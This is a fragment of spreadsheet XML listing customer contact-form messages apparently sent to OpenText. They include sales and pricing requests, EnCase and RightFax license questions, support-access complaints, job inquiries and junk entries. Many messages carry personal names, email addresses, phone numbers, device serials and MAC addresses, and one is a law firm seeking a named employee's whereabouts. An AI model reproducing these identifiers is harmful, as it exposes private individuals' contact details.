    <t>I work for an advertising agency, and have a manufacturing client that is interested in making use of a DAM solution, and would like to speak with someone about possibly using Open Text. Thanks.</t>
  </si>
  <si>
    <t>I am facing issue while connecting to open text quality server where I am able to connect to DEV using administrative client 10.5</t>
  </si>
  <si>
    <t>We are in the procurement phase for a framework to support our digital production worldwide. We would like to share our RFI with you.</t>
  </si>
  <si>
    <t>Training support has unresponsive for several weeks.  I have sent multiple emails and voice messages and I need assistance with my PAID FOR subscription.  Please escalate this as high as possible in the hopes I will get some contact from you.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren. Ich hätte eine Frage bezüglich einer Rechnung und würde diesbezüglich gerne per Mail mit Ihnen Kontakt aufnehmen. Schicken Sie mir bitte die entsprechende Mailadresse. Danke und viele Grüße, Gabriella Gulyas</t>
  </si>
  <si>
    <t xml:space="preserve">Please forward payment remittance address for payments by check. _x000D_
Thank you, </t>
  </si>
  <si>
    <t>Hello, I few days ago I contacted you through this link (in order to confirming your interest to participate in a  coming RFP that we will launch ) but I did not receive any answer. Can I have an email so I can send  project details? (Marco.Silva@Millicom.Com) -&gt; Thanks</t>
  </si>
  <si>
    <t>I was on your website trying to download the version of EnCase Forensic 8.08 but it would not allow me to do so. Can you help me with this problem. Thank you.</t>
  </si>
  <si>
    <t>We have no LiveLink support right now as HQ MRMC is working on bringing an employee on and I am not able to enter agreements and I have been able to enter them before.  No one has any idea as to what it keeps saying "value not valid."  Who do I call for this as it is a main function of my position to enter these agreements into LiveLink.  Also, our phones have been moved around and you can reach me directly at 301-619-2172 but you cannot leave a voicemail on that line as I cannot retrieve it.  Please leave a voicemail on 301-619-2372.</t>
  </si>
  <si>
    <t xml:space="preserve">I need an invitation number in order to have access and to receive remittance information. </t>
  </si>
  <si>
    <t>Looking for information on the Trusted Link software we are running.  Specifically_x000D_
1. What version do we have?_x000D_
2. Is it current or end of life or extended maintenance? (etc)_x000D_
3. What is the next version that will be available?_x000D_
4. When will the next version be available? _x000D_
We are paying 12 mo maintenance invoices for these:_x000D_
P40 Software_x000D_
Gateway  Comm</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot access 'MySupport' - is requiring confirmation email/registration when I already have an account. </t>
  </si>
  <si>
    <t>We currently use EnCase ver. 7.11 with dongle id of V1291015469. We want to upgrade our version to 8. Can you please contact us to help on getting the new version. _x000D_
Thank you._x000D_
Regards</t>
  </si>
  <si>
    <t>Hej, Vi har fått en förfrågan från en slutkund, ang StreamServe Maintenace licenser. Vill därför höra oss för om ni är leverantören av StreamServe licenser? _x000D_
_x000D_
Om ja, kan ni hjälpa oss reda ut om detta är något vi har möjlighet att erbjuda våra slutkunder, och hur vi ska gå till väga för att få fram prisunderlag?_x000D_
_x000D_
Tack så mycket på förhand.</t>
  </si>
  <si>
    <t>Does OpenText Exceed support HiDPI scale on win10?</t>
  </si>
  <si>
    <t>Is there a certification for Encase issued by the company Media Recovery that is an Encase authorized certification, e.g. EnCase Professional?</t>
  </si>
  <si>
    <t>For loan</t>
  </si>
  <si>
    <t>Technical Issue: Cannot generate evaluation license._x000D_
_x000D_
Due to network restrictions, evaluation license couldn't be generated from bravadesktop.msi tool, and a new webpage opens. When I click 'Get License Key File' from the webpage, no action happens (no download, no pop-up etc). When page is reloaded, it says 'A demo license has already been issued for this computer', however it is not located in the usual downloads folder. _x000D_
Can you help to find this license file or generate a new one?_x000D_
_x000D_
FYI, MAC ID is 00-FF-10-00-9D-56</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I work at Belltech Chile, we are clients of Guidance, now OpenText. Some years ago we bought Encase Forensic._x000D_
_x000D_
We need get some files from a hard disk (unalocked cluster) and for this we need to have the Encase Forensic working, but  we don´t have the installer (software). _x000D_
_x000D_
At this moment, we have the key (usb device) for Encase Forensic, but we don´t have the "software", then Can you send us a link for download it, please?_x000D_
 _x000D_
Our key has this serial number of the USB device is: G2002047153_x000D_
_x000D_
Thank you very much,_x000D_
_x000D_
Luis</t>
  </si>
  <si>
    <t>We would like to start a contact with you since we have an application in Gupta Team Developer 2.1 and we need to migrate it to a newer version (like OpenText TM_x000D_
Gupta Team Developer 7.0 or newer). Please let me know how to continue with this contact with you_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">interested </t>
  </si>
  <si>
    <t>Address details update</t>
  </si>
  <si>
    <t>Hi_x000D_
We have contacted you yesterday regarding EIM system. Please will you attend to our request. Thank you._x000D_
BR - Fahad</t>
  </si>
  <si>
    <t>Opentex renewal</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Can someone advise me when my EnCe runs out and what I need to do to renew it. Also, what is the associated cost?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>brdht</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Sir/Ma’am,_x000D_
_x000D_
Good day!_x000D_
_x000D_
May this letter find you in a good spirit!              _x000D_
We are sending you this letter to request for your kind assistance regarding MS. PRINCESS PIA P. MALABANAN She declared EMPLOYEE at OPEN TEXT PHILIPPINES INC, so that we our conducting ocular inspection before we proceed, Can I have any information for his whereabouts, or kindly advise MS. PRINCESS PIA P. MALABANAN call and coordinate with our law firm to discuss a very important matter.  _x000D_
  _x000D_
                We look forward to your favorable response and will appreciate whatever assistance you may give pertaining to our request. Please contact us at (+632) 6406629 and (+639) 178467569; (+63) 9188074309 or kindly send us email upon receipt of this. For any information of the above mentioned employee. _x000D_
_x000D_
Thank you and more power!_x000D_
_x000D_
Very truly yours, _x000D_
_x000D_
Mr. JUBINARD FRIGILLANA_x000D_
  Legal Officer_x000D_
 _x000D_
 Telan Hipe Flores Telan &amp; Associates, Inc._x000D_
 (632) 640-6629| (639) 9188074309| (639)176545527| FAX: (632) 631-0180_x000D_
 |EMAIL: plegal@telanlaw.com / jbarunia.atl@telanlaw.com_x000D_
 _x000D_
 This message is confidential. It may also be privileged or otherwise protected by work product immunity or other legal rules. If you have received it by mistake, please delete it from your system and do not copy this message or disclose its contents to anyone. Telan Hipe Flores and Associates Co;. accepts no liability for the content of this email, or for the consequences of any actions taken on the basis of the information provided, unless that information is subsequently confirmed in writing. Any view or opinion expressed in this email are solely those of the author and do not necessarily represent those of Telan Hipe Flores and Associates Co;.. The integrity and security of this message cannot be guaranteed on the Internet. The recipient should check this email and any attachments for the presence of viruses. Telan Hipe Flores and Associates Co;. accepts no liability for any damage caused by any virus </t>
  </si>
  <si>
    <t>Please unsubscribe this email address from all and any communications from OpenText._x000D_
Thank you</t>
  </si>
  <si>
    <t>sdaggead</t>
  </si>
  <si>
    <t>Wanted to explore eFax option</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Faisant une étude lors d'un cursus de formation, je recherche le nombre d'utilisateurs d'OpenText (leader CSP 2018 - Magic Quadrant) en France._x000D_
Si vous pouviez me répondre, vous me rendriez un grand service._x000D_
Je vous remercie par avance._x000D_
Cordialement.</t>
  </si>
  <si>
    <t>i just wanted to require if how much is your service fee? hope for your response asap thank you.</t>
  </si>
  <si>
    <t>srfdh</t>
  </si>
  <si>
    <t>I want to see if my name is on the list</t>
  </si>
  <si>
    <t>hgfhfghbgfhgbdsf</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am contacting regarding my knowlegde base access. It is not working anymore._x000D_
Could you please make the necessary so my access is working again ?_x000D_
Kind regards,_x000D_
Mathieu</t>
  </si>
  <si>
    <t>Download right fax  client 64 for Outlook 2013</t>
  </si>
  <si>
    <t>Respected Sir, As per discussion with your staff, we are facing "Certificate Issue" problem with our Encase Dongle, Please help out to us or do needful action against your end to solve this issue urgently please,_x000D_
    I am waiting for your response. thanks</t>
  </si>
  <si>
    <t>csdc</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Flushing, NY </t>
  </si>
  <si>
    <t>gvs</t>
  </si>
  <si>
    <t>New York</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I am Accenture employee and looking for Information to raise request for "A new demo system account" of "OpenText SAP Products" . Basically I am looking for information to raise request for access to IDEA Online demo account . Kindly advise. Thanks In advance._x000D_
_x000D_
Regards,_x000D_
Sunil Sabani</t>
  </si>
  <si>
    <t>SY</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8 (495) 374-69-05 , Олег.</t>
  </si>
  <si>
    <t>One of my clients in India wants to automate Vendor Invoices and Integrate with Quickbooks if possible. Would like to understand if Open Text can do support this._x000D_
Kesari</t>
  </si>
  <si>
    <t>I took a 3 day class "Managing Documents in Content Server v16.2 " on April 16, 2018 and I did not receive my completion certificate.. can you generate one? and email it to me?</t>
  </si>
  <si>
    <t>Small pharmaceutical company regulatory group (~5 people) looking to collaborate with ~5 contract organizations for regulatory affairs submissions.</t>
  </si>
  <si>
    <t>We have a current customer Levitt Safety with an existing RighFax solution. Wanted to verify what they currently have in place as we are recommending expanding existing services.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for document and client management automation services. </t>
  </si>
  <si>
    <t>After filling out a sales inquiry form and not hearing anything back, I attempted to get through to your sales department. Your web site includes a pull out on its right side, which provided the following phone number:_x000D_
_x000D_
(888) 999-9712_x000D_
_x000D_
This number is apparently no longer operational.</t>
  </si>
  <si>
    <t>The logos on partner pages and the application marketplace are broken.</t>
  </si>
  <si>
    <t>Looking for a quote on 80 seats of Content Suite Platform for the City of Portland (Oregon). Jack Robinson is our representative for our project at the City of Seattle but he mentioned there have been some recent changes and he no longer covers Oregon. Anyway, I just need a quote for 80 seats this week as our proposal goes in next week.  Thanks.</t>
  </si>
  <si>
    <t>RedactIT integration and pricing.</t>
  </si>
  <si>
    <t>I'd like a basic pricing sheet for on-prem TrustedLink solution.  Startup, per partner connection, by message (if appropriate), by kchar (if appropriate).  I would appreciate this as soon as possible before I will talk to a sales / solutions rep._x000D_
Thanks,_x000D_
Eric</t>
  </si>
  <si>
    <t>Need a W-9 form for Open Text now that invoices no longer have Easylink listed._x000D_
and to have our company name changed to Dana-Farber Community Cancer Care.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs_x000D_
_x000D_
Please can I inquire about the provision of a potential online platform for sharing access to confidential documents. _x000D_
_x000D_
The documents are of a highly sensitive nature which only permits limited personnel to have access to them. Can you offer me any advice as to whether you are able to provide a service where individuals will be able to log on to access the documents whilst also prohibiting the function of printing and saving the documents and if so could you please provide me with a quote? We do not anticipate a large number of documents._x000D_
_x000D_
If any of the above is unclear please feel free to contact me on 0207 420 0272. _x000D_
_x000D_
Yours faithfully _x000D_
Priya_x000D_
</t>
  </si>
  <si>
    <t>I am looking job to suport my faliiy and   l can work hard as much i can .to  make sure my employe proud for me</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Years ago we bought an Encase license, we have the key (usb device), but we do not have the software, from where we can download it. I think the version was 7.0, but I'm not sure._x000D_
_x000D_
They could help me, I could tell them the serial number of the key._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Oscar</t>
  </si>
  <si>
    <t>Need to know email address the reset password is going to.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I cannot enter my support page for downloading hashsets for Encase V8.08</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I need support on uploading data into our GSX catalogue for our vendors.  </t>
  </si>
  <si>
    <t>I'm applying internship at your company, Iam waiting feedback</t>
  </si>
  <si>
    <t>RightFax solution part of MPS proposal.  Need pricing support.  Thank you!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
As of Monday 17/12/2018 Xillio will move to a different address. Can you please change our detaills on your website? Our new address is:_x000D_
_x000D_
Xillio_x000D_
's-Gravelandseweg 178_x000D_
1217GB Hilversum_x000D_
_x000D_
Please let me know._x000D_
_x000D_
Thank you in advance.._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Nandi van der Horst_x000D_
Xillio</t>
  </si>
  <si>
    <t>Please contact by e-mail._x000D_
Hello_x000D_
We have an issue to run program in UNIX using Putty. It works fo Exceed ver 14, but doesn't work for Exceed ver 15. For more details please contact us by e-mail. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">License Key - OTCS Ticket 3303192_x000D_
10071919 - Ericsson AB _x000D_
End User Company: 10071919 - Ericsson AB_x000D_
Reseller/Distributor Company:_x000D_
Sales Order Number: 7503_x000D_
Delivery Number: 8000003748_x000D_
System Unique ID (SUID): 00000X00000_x000D_
Software License Description:_x000D_
Software Serial License Description:_x000D_
Not able to access my support account or blogs, everytime when tried to login it is sending verification email, after verification click it is showing success message. after that when tried login again same happened again and again. need urgent help here._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team, I'm writing to you becase I'm not sure if my company has a Support Contract with you and would like to find that out. If not, I would like to ask what are my options to gain access to your leanring and support pages? </t>
  </si>
  <si>
    <t xml:space="preserve">we are an IT supplier _x000D_
we need reseller price for qty5  Brava desktop software_x000D_
_x000D_
thankyou </t>
  </si>
  <si>
    <t>I have been talking to support department about getting support directly from OpenText. Our reseller and support in Israel has changed, and we would like to get an offer from you - that Opentext will be our seller and supporter for our EDocs product.</t>
  </si>
  <si>
    <t xml:space="preserve">Questions regarding product "OpenText InfoFusion Integration Center" (V. 16.2), e.g. Trainings and documentation material_x000D_
</t>
  </si>
  <si>
    <t>Need to check on Support services provided by opentext</t>
  </si>
  <si>
    <t xml:space="preserve">client is looking for below; please help to quote _x000D_
Hummingbird Exceed, 1set </t>
  </si>
  <si>
    <t>I am not very clear with my Encase Forensic support site which has the latest Encase update and tools including the documents, others.  How do I also check my current status of SMS and the support details with OpenText ?  My Encase dongle ID is G2002060975 and G2002028695. Kindly please email me the details/steps ? or contact me. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hey _x000D_
_x000D_
We run a manufacturing business, I want to connect a management system that i can work on to automate processes and documents that connects with a manufacturing assembly planning, inventory, QC and BOM system. I would also like to use it for after sales data collection, automation and management. Can you please contact me with more information and pricing?_x000D_
_x000D_
Cheers </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have gone through your website and interested to know more about OpenText Enterprise Information Management (EIM). We need a detail presentation of all the framework and elements involved in EIM and how can we work together to promote it in Oman. Please will you help us understand first ho EIM works and then send us some material to present it to our clients here in Oman. And I've noticed you have an office in UAE, what is the nature of projects executed in UAE? please provide some details._x000D_
_x000D_
Secondly, please will you provide us contact details of the person who is responsible for Business Development in the Gulf Region with whom we can coordinate and work with for presentations and technical details presented to the clients here. Thank you and we look forward to work together on this project._x000D_
_x000D_
Best Regards,_x000D_
Fahad</t>
  </si>
  <si>
    <t>Dear Colleagues!_x000D_
_x000D_
10.12.2018 a message was posted from me in a similar way, with a request to share information on what actions need to be taken (license acquisition, where to download the distribution kit for installation ....) in order to deploy Open text? Unfortunately, no reply has yet been received. We have a Partner Program with SAP (Partner ID - 912640). Perhaps in this program you will have suggestions?_x000D_
My contacts: veronika.russkih@pwc.com_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>adasgffdhgfdg</t>
  </si>
  <si>
    <t>We like you to perform an audit on our documentum environment which has performance degradation after upgrading to SXP 2.3</t>
  </si>
  <si>
    <t>Request for Distributorship in Bangladesh_x000D_
_x000D_
Dear Concern, _x000D_
Heartiest Greetings from Bangladesh. I am representing Celltron Electro Manufacturing Services Limited registered in Bangladesh. We are the pioneers of SMT industry in Bangladesh having PCB manufacturing and assembly facility along with a large R&amp;D team. _x000D_
_x000D_
Apart from manufacturing medical devices we maintain close relation with the security agencies of our country. So far, we have provided numerous software solutions to our government security agencies. We also have provide security consultancy services to the agencies.  _x000D_
_x000D_
While working with our security agencies we have found that there is a large market for Digital Forensic Lab equipment and software which have close to zero representation in our country. Considering this we would like to represent your company in our country. We believe our collaboration will be prosperous for both of our companies. _x000D_
_x000D_
We are looking forward reply from you. Please feel free to contact me for any kind of queries. _x000D_
  _x000D_
Best regards,_x000D_
Soiran Chakma</t>
  </si>
  <si>
    <t>向最伟大的Encase,学习计算机取证</t>
  </si>
  <si>
    <t>YEs</t>
  </si>
  <si>
    <t>regesr</t>
  </si>
  <si>
    <t>bxbrbvr</t>
  </si>
  <si>
    <t>TFHURYTF</t>
  </si>
  <si>
    <t>Leisure and Cultural Services Department, HKSAR has issued an invitation of quotation which required to renewal one lot of opentext software. Would like to have hk distributor or sales to contact me and quote me the renewal price.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, _x000D_
_x000D_
The reason for contact is as I was in work and was chatting to one of your kind colleagues and was told to send an email to your selves at the Cork Office about possible employment? What would the process be like, an internship? As he had witnessed my manager talk about the high turn over of staff in the store and I had only recently begun he gave me your website contact details._x000D_
I have two and a half years of an Architecture degree deferred as I realised it wasn't for me as a career choice! I explained this to your employee and he saw I had the love for computers and phones and how the technology of them worked. _x000D_
_x000D_
I know it's a long shot but I figured I'd email and see if I could get into the IT industry quicker as it is now my definite career choice! Any help or direction on this matter would be much appreciated. Thanks _x000D_
_x000D_
Kind Regards,_x000D_
Jamie Rafferty_x000D_
Vodafone - The Phone Stores._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">hello, I work at a medical device company and we receive orders via multiple channels, such as, GHX, GXS, TNET. We have to access them in different windows to modify any orders that may have came over with errors. We are looking to consolidate them into one console that can communicate with our ERP system, which is Oracle. Can you please advise if this is the type of service you can provide? </t>
  </si>
  <si>
    <t xml:space="preserve">Please add Support portal access for _x000D_
Tim Williams          (twilliams@theravance.com)_x000D_
Moww Abdin          (MAbdin@theravance.com)_x000D_
Parham Kamali      (pkamali@theravance.com)_x000D_
under the existing Theravance Biopharma account._x000D_
Thanks_x000D_
Tim_x000D_
</t>
  </si>
  <si>
    <t>I have a customer (Umpqua Bank) that would like to speak with someone from the company (Sales Rep) or someone that can speak to them from a product perspective.  They are looking at Fax2Mail.  _x000D_
_x000D_
Thanks,_x000D_
-Scott</t>
  </si>
  <si>
    <t>We are getting setup for EDI with Nordstrom and was informed that we needed to establish an account with openText to manage our catalog.  When I started typing my company name in the field above, Chrome Industries came up.  Do we already have an account with OpenText?  If not we need to establish an account.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in discussing partnership opportunities as a service partner. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are right person to discuss about the contact list of Information Security industry._x000D_
_x000D_
Below are few target prospects that you can target regarding your products and services._x000D_
_x000D_
CEO, CIO, CTO, COO, C suite level professionals, Security solution managers, Analysts, Security infrastructure managers, Product managers, Cyber security Director/Manager, VP, IT Director/Manager, CSO, Chief Information Officer, Chief Technology Officer, Chief Executive Officer, Chief Operating Officer, Managing Director, Chief Security Officer, Business Owners, Executive Management, Facilities Managers, Estates Managers, Architects, Planning Engineers, Designers, Building Consultants, IT Managers/Directors, CISO, CTO, System Architecture, Engineers and other key decision makers. _x000D_
_x000D_
Sectors: Finance, Government, Retail, Pharmaceutical, Aviation, Freight &amp; Cargo, Sporting, Utilities, Communications, Oil &amp; Gas, Healthcare, Education, Hotel Chains,Biotech and many more._x000D_
_x000D_
Kindly let me know your target criteria so that I can provide you more information with few free samples._x000D_
_x000D_
Target Industry :_x000D_
Target Job Titles :_x000D_
Target Geography :_x000D_
_x000D_
Regards,_x000D_
Ethan Morris</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I would like to request a completed copy of Open Text's current W-9. We are in need of this form to update the vendor records in our system and to have the ability to pay our bills via check with the updated information._x000D_
_x000D_
Thank you,_x000D_
Lauren Small </t>
  </si>
  <si>
    <t>talk about switching to cloud version of right fax</t>
  </si>
  <si>
    <t xml:space="preserve">I believe that we have the full Captiva Capture production support with you.  Would you please allow me to access the support pages to review or to create the service requests.  Thanks. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We're getting the following message in the SAP Readiness Check:_x000D_
SAP ADD-ONS ARE NOT (YET) SUPPORTED FOR SAP S/4HANA: SAP Invoice Management 5.2 by OpenText on SAP ERP 6.0_x000D_
_x000D_
So we'd like to know if this component is compatible with SAP S/4HANA or the Customer requires to reimplement with other SAP functionality or to migrate to other 3th party solution._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Noel Flores</t>
  </si>
  <si>
    <t>Looking to migrate on premise solution to cloud.</t>
  </si>
  <si>
    <t>possible license purchase.  We currently have encase forensic but are looking for a way to image computers over the network (not crossover) by pushing the applet over group policy but for only 1 computer at a time</t>
  </si>
  <si>
    <t>I need a partnership</t>
  </si>
  <si>
    <t xml:space="preserve">I want to get a job </t>
  </si>
  <si>
    <t>Need info about your cloud offerings. Specifically ones that support Records Management</t>
  </si>
  <si>
    <t>Cooper Tire is using MetaStorm BPM and would like to talk to someone about what it would take to upgrade to OpenText MetaStorm MBPM.</t>
  </si>
  <si>
    <t>Where can I find documentation/user guide and sample code for OpenText MBPM Enterprise Component Libraries (ECL) ? _x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am starting a Real Estate Brokerage business with a team of less than 10 people. Are your services something that we can use? If yes, can you please let me know at what capacity and how?_x000D_
_x000D_
Thank you, _x000D_
Humaira Naikyar</t>
  </si>
  <si>
    <t>we have Easylink account and I have successfully set up several users for receiving faxes into email.  I see that there is a VFM solution that allows virtual desktop faxing - is this something I can use with Easylink or is this separate product?  Or does it only work with your RightFax product?</t>
  </si>
  <si>
    <t xml:space="preserve">When and where will the Enfuse 2019 conference be?  </t>
  </si>
  <si>
    <t>Hi, I  would like to know if the new Brava Desktop version is compatible with windows 10</t>
  </si>
  <si>
    <t>Exploring options to find a suitable tool we can use to store our engineering document, specifications, has an approval routing process and external access to vendors.</t>
  </si>
  <si>
    <t>RFI - document management</t>
  </si>
  <si>
    <t>I am looking for a simple texting to all employees solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to get some insight on a package for use at the medical command building for the Montana Guard.  We often request medical documents and our fax lines never work.  The Idaho Guard recommended your program. </t>
  </si>
  <si>
    <t>Hello, I would like to talk with someone about the technical requirements and cloud solutions that can be used with the Opentext application. The stedin contract number is 0017010388 and the customer id is 10426706. Also requested more access to the information available and that is registered at your side with ticket number 4027952. Hope someone can contact me. With regards, Ed van Loenen Stedin</t>
  </si>
  <si>
    <t>Interested in document management.  Open text is being implemented at my company for records retention and archiving.  Would like to discuss what additional options are available</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have an in house fax service through RightFax/Opentext and are looking to migrate this service out to the cloud.  I've been asked to research the entire process. You can reach me at my business phone or email (whichever is more convenient for you. Thanks so much, Mark Reilly </t>
  </si>
  <si>
    <t>We need to purchase support for our RightFax service.  The last vendor we had was terrible in support and we did not renew the service.  We are going to be making changes this year and will need support. Thank you.</t>
  </si>
  <si>
    <t>I work with John Wyatt from Kohler Company and he is on vacation this week. I need an invoice for our Guidance Encase Renewal that I believe was paid in the last month. Let me know what information you need from me to get this invoice.</t>
  </si>
  <si>
    <t>Where have the downloads for EnCase been moved to? I am attempting to upgrade our EnCase version but cannot locate where the downloads are. We have multiple dongle licenses through the Army. _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>We previously purchased a license for Brava DTX version 16.3. IGCKey.lic file seems to be tied to the MAC address of the PC it was purchased for. That PC has since been replaced, and we would like to see if the license can be transferred. It may have been ordered through the email address of the end user, Dave Stahura (daves@martin-eng.com). CommonCustomerNumber is 461193. Original MAC is 3C-A9-F4-6C-D1-C5. MAC of new PC is 74-70-FD-4B-DB-10.</t>
  </si>
  <si>
    <t>Bonjour. Nous utilisons actuellement la solution Alfresco pour partager des documents avec nos membres et des industriels. Nous souhaitons migrer vers une nouvelle solution et nous étudions les solutions du marché. Dans ce cadre, nous aimerions une première démonstration de vos solutions.</t>
  </si>
  <si>
    <t>I have RightFax Express software SUID-62702-12345 - My account does not grant me access to OpenText Connect for Knowledge base access  -  Purchase solution from RICOH_x000D_
-Thank you _x000D_
Ted</t>
  </si>
  <si>
    <t>Cost of Hosted First Class for 450 users</t>
  </si>
  <si>
    <t>We are working on a client solution for migration to AWS. They have Opentext CMS application. Want to understand the licensing limitations that can be faced for this particular application when migrating to AWS.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a current license for Encase Forensic but am no longer getting the emails to download the latest version.  Can you please insure that my email address is on the software updates list.  _x000D_
Thanks in advance,_x000D_
Jonathan_x000D_
</t>
  </si>
  <si>
    <t>I am unable to see my products list in My Support as it is showing No Access.  Our Product ID EU0270654 &amp; EU0332563.  In view of the above I am unable to check the renew details of my Products. Hence you are requested to provide access for our Products to check the details.</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
I'm Tuan writing from CIC Corp. We are dealer of Autodesk, CSI, Adapt, Plaxis ...in Hanoi, Vietnam. _x000D_
_x000D_
Now, we have a customer want to purchase OpenText™ Brava!™ Desktop_x000D_
View. Could you please send the quote for us and list price for End-User._x000D_
_x000D_
Thank you_x000D_
_x000D_
Tuan</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
bisher betreiben wir die SAP-Datenarchivierung, indem wir die erzeugten Archivdateien im Dateisystem des SAP Content Server ablegen. Zur Herstellung der Revisionssicherheit möchten wir allerdings in 2019 ein geeignetes Archivsystem anschaffen. Mein Kollege Herr Bernd Thielemann hat mich diesbezüglich auf ihr Produkt „OpenText Data Archiving for SAP Solutions“ hingewiesen, wohl auch da wir bereits das optische Archiv mit OpenText in unserem Haus abbilden. Ansprechpartner für uns bei OpenText ist hier Jan Wimmers._x000D_
Eine wichtige Anforderung ist es die Archivdateien vom Filesystem (etwa 130 GB) unseres SAP Content Servers in die neue Archivlösung zu migrieren. Sowohl für Datenmigration, als auch Einführungsprojekt und laufende Kosten benötige ich von Ihnen ein Angebot._x000D_
_x000D_
Weitere Fragen:_x000D_
1)	Welche Betriebssysteme unterstützt das Produkt „OpenText Data Archiving for SAP Solutions“?_x000D_
2)	Ist für das Betreiben der Archivlösung ein zusätzlicher Datenbank- oder Archivserver erforderlich?_x000D_
3)	Gibt es noch genauere, insbesondere technische, Produktspezifikationen? Den Produktflyer und die Infos von ihrer Homepage habe ich bereits gelesen. Speziell wären auch Screenshots zur Anwendung hilfreich, um einen ersten Eindruck zu bekommen._x000D_
4)	Wie sieht die Lizensierung des Produktes aus? Nach SAP-Usern, Unternehmensgröße etc.?_x000D_
5)	Welche wiederkehrenden Kosten fallen an? Wartungs- und Supportkosten?_x000D_
6)	Sind neben den durch SAP ermöglichten Beleganzeigemöglichkeiten weitere Anzeige-Features im Produktumfang enthalten?_x000D_
_x000D_
Vielen Dank und freundliche Grüße_x000D_
Marc Börner_x000D_
</t>
  </si>
  <si>
    <t>Hello, my name is Aurimas, I'am logistic engineer in company HELLA. We would like to get more information about your product "Open text imaging" and it's integration with SAP system. Could you please provide us more information about this product.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm in need of documentation about the system requirements for this release (xPresso and xPression 4.6).._x000D_
SO, RAM, Office, ect_x000D_
Thanks a lot.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We came to  know about your company through internet searching._x000D_
_x000D_
Please find attached tender from one of our reputed customer so please confirm prices for the products in which you deals and we hope if we get this business this would be beneficial for both of us._x000D_
_x000D_
We are looking forward your early answer._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Muhammad Akhtar.</t>
  </si>
  <si>
    <t>nimasile</t>
  </si>
  <si>
    <t>Want to know regarding the openings and eagerly waiting to attend interview and work with the company.</t>
  </si>
  <si>
    <t>nothings</t>
  </si>
  <si>
    <t>0000，Hacienda Heights, CA 91745</t>
  </si>
  <si>
    <t>Please delete my account.</t>
  </si>
  <si>
    <t>nothin</t>
  </si>
  <si>
    <t>nohitng</t>
  </si>
  <si>
    <t>I have a customer renewal expiring on 12/15/18.  Customer would like a renewal quote.  Please contact me at the phone number provided.</t>
  </si>
  <si>
    <t>I am responsible for researching document management systems for the credit union's legal department and I would like to get some information regarding eDocs. I have used the program at several law firms in my career and am looking to see if it might be a solution for us here. Please contact me at your earliest convenience. I look forward to getting information and moving along in the process._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Justin Monnet</t>
  </si>
  <si>
    <t>inquiry to compatibility of Open text EDRMS with HP MFP devices ( Urgent )</t>
  </si>
  <si>
    <t>We are currently using rightfax for our business and we want to find out more information about fax2mail option. Please call us at 212-416-0175</t>
  </si>
  <si>
    <t>I would like to have the ability to send output from my ERP platform and then based on the trading partner, translate and transmit to either ANSI X.12, email of Fax.  Does Opentext support this?</t>
  </si>
  <si>
    <t xml:space="preserve">What the cost for OpenText Analytics serving 80 employees? </t>
  </si>
  <si>
    <t xml:space="preserve">Requesting my account be given full access to software downloads, so that I may be able to download and keep up to date Encase v.8. </t>
  </si>
  <si>
    <t>Good Afternoon Opentext!_x000D_
_x000D_
My name is Adrienne Hillman and work for the Texas Municipal Police Association. Next year we are hosting the first Digital Investigations Tech Conference for the state of Texas law enforcement community and we are excited. I see from browsing your website that you offer a cool Forensic Toolkit: Digital Investigations and I am interested in getting more information about it. We are not able to have vendors set up at this conference, however, I would love to get close to 200 brochures to include in all the participants welcome bags about your products that could assist them with investigations. Please let me know if this is possible. _x000D_
_x000D_
Adrienne Hillman</t>
  </si>
  <si>
    <t>Hi Open Text Philippines Human Resources Team,_x000D_
_x000D_
I am an Insurance Advisor of AXA Philippines that provides life insurance solutions for:_x000D_
_x000D_
- health (to complement HMO or as alternative)_x000D_
- income protection/replacement (in case of untimely passing of breadwinner/parent)_x000D_
- investment (linked to stock market)_x000D_
- education (for kids 10yo and below)_x000D_
- retirement (to complement government/company pensions or as main alternative)_x000D_
_x000D_
as well as non-life (or general) insurance for:_x000D_
_x000D_
- auto (compulsory 3rd party liability, own damage and theft, 3rd property damage and bodily injury, passenger personal accident)_x000D_
- fire/property (home, condo and business security)_x000D_
